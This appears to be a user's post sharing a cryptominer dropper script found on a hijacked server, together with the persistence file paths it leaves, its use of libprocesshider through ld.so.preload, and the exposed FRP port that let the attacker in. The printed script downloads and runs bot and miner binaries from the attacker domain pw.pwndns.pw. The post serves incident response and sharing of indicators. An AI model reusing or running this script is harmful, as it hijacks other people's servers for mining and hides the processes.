Found a script running on my server, that was hijacked and this script was left on it.

miner-malware.sh

#!/bin/sh

domain="pw.pwndns.pw"
root=$(id -u)
ARCH=$(uname -m)
if which curl > /dev/null 2>&1;	then
	dl="curl --fail --silent --connect-timeout 5 --max-time 10 --retry 1 -o"
	read="curl --fail --silent --connect-timeout 5 --max-time 10 --retry 1"
elif which url > /dev/null 2>&1;	then
	dl="url --fail --silent --connect-timeout 5 --max-time 10 --retry 1 -o"
	read="url --fail --silent --connect-timeout 5 --max-time 10 --retry 1"
elif which get > /dev/null 2>&1;	then
	dl="get -q --connect-timeout 5 --timeout 10 --tries 2 -O"
	read="get -q --connect-timeout 5 --timeout 10 --tries 2 -O-"
elif which wget > /dev/null 2>&1;	then
	dl="wget -q --connect-timeout 5 --timeout 10 --tries 2 -O"
	read="wget -q --connect-timeout 5 --timeout 10 --tries 2 -O-"
else
	dl=""
	read=""
fi
myip=$($read http://$domain/?ip)
servers=$($read http://$domain/servers/server.txt | grep $myip | wc -l)
if [ "$servers" = "1" ];	then
	pid=$(ps x | grep -v -e grep -e R | grep -e  "/usr/sbin/ddr" -e "ddrirc" -e "sshd$" | awk {'print $1'})
	if [ -z "$pid" ];	then
		if [ "$root" = "0" ];	then
			service ssh start
			service sshd start
			/etc/init.d/sshd start
		fi
		cd /dev/shm || cd /tmp ; rm -rf -- $ARCH $ARCH* .$ARCH* -bash;  $dl -bash http://$domain/bots/$ARCH ; chmod +x -- -bash ; ./-bash ; rm -rf -- -bash -bash* .-bash*
	# else
		# ps x | grep -v -e grep -e R | grep -e  "/usr/sbin/ddr" -e "ddrirc" -e "sshd$" | awk {'print $1'} | while read -r p; do kill -9 "$p"; done
		# rm -rf /tmp/.ddr
	fi
else
	ips=$(host xmr-rx0.pwndns.pw | awk {'print $4'} | while read -r ip; do echo " -e $ip ";done)
	ips="$ips -e 185.45.192.135"
	ssips=$(ss -np | grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' | sort | uniq | grep $ips)
	if [ -z "$ssips" ];	then
		cd /var/tmp/ || cd /tmp/ ; rm -rf -- $ARCH $ARCH* .$ARCH* -bash ; $dl -bash http://$domain/miners/$ARCH ; chmod +x -- -bash ; ./-bash -c -k -dp 443 -tls -p 443 -tls -dp 3333 -p 3333 -d; rm -rf -- -bash .$ARCH* $ARCH*
	fi
fi

Also look for the following.

crondr mcrondr

/bin/bprofr
/sbin/-bash
/bin/-bash
/etc/cron.hourly/pwnrig
/etc/cron.hourly/ntpdate
/bin/crondr
/sbin/mcrond
/sbin/bcrond
/etc/systemd/system/pwnrige.service
/bin/sysdr
/etc/cron.daily/pwnrig
/etc/cron.daily/ntpdate
/etc/cron.monthly/pwnrig
/etc/cron.monthly/ntpdate
/etc/cron.weekly/pwnrig
/etc/cron.weekly/ntpdate
/bin/initdr
/etc/init.d/pwnrig
/sbin/minitd
/etc/init.d/ntpdate
/etc/cron.d/pwnrig
/etc/cron.d/ntpdate
/sbin/mcrond
/sbin/msysde
/sbin/msysdl
/var/tmp/.update/.x86_64

concealment used https://github.com/gianlucaborello/libprocesshider
`
root@vm:/# cat /etc/ld.so.preload

/usr/local/lib/libprocesshider.so

root@vm:/# rm -f /usr/local/lib/libprocesshider.so
`

In my case, it was caused by FRP, which exposed the port on the internet. I added a token in the config file, hope it will no longer be invaded.